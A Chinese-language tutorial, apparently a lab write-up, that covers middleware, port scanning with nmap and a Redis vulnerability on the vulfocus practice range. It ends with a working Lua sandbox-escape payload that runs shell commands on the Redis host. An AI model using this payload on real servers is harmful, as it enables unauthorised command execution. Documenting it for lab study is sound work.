本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
一,中间件。
1,什么是中间件。
是一类能够为一种或多种应用程序合作互通、资源共享,同时还能够为该应用程序提供相关的服务的软件。中间件是一类软件统称,而非一种软件;中间件不仅仅实现互连,还要实现应用之间的互操作。
具体请参考:通俗易懂的讲讲什么是中间件?
2,中间件作用。
判断服务是否开放,一般各种服务都有其对应的端口,如果对应的端口不存在,则说明此服务没有开启,也就没有后续测试的必要了。
3,如何判断端口是否开放。
可以使用nmap等工具,通过探测开放的端口以判断服务是否开放。一般情况下都是开放默认端口,例如3306端口对应的就是mysql服务,但不排除开发者更改端口来进行防御。
nmap只能通过Ip进行扫描端口,首先要把网址所对应的ip查出来。
本机(物理机)上所开放的端口如上,ip为http://192.168.131.206/。
为了减少扫描时间,此处使用-p标签,指定扫描从8000到8100范围的端口。
可以看到,所开放的端口。
二,靶场。
靶场这里使用的是vulfocus,直接注册就可以使用。
本文主要讲解vulfocus靶场的redis漏洞。
redis数据库默认端口为:6379;redis简述。
工具链接,搭建教程
连接成功。
查看flag
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls /tmp", "r"); local res = f:read("*a"); f:close(); return res' 0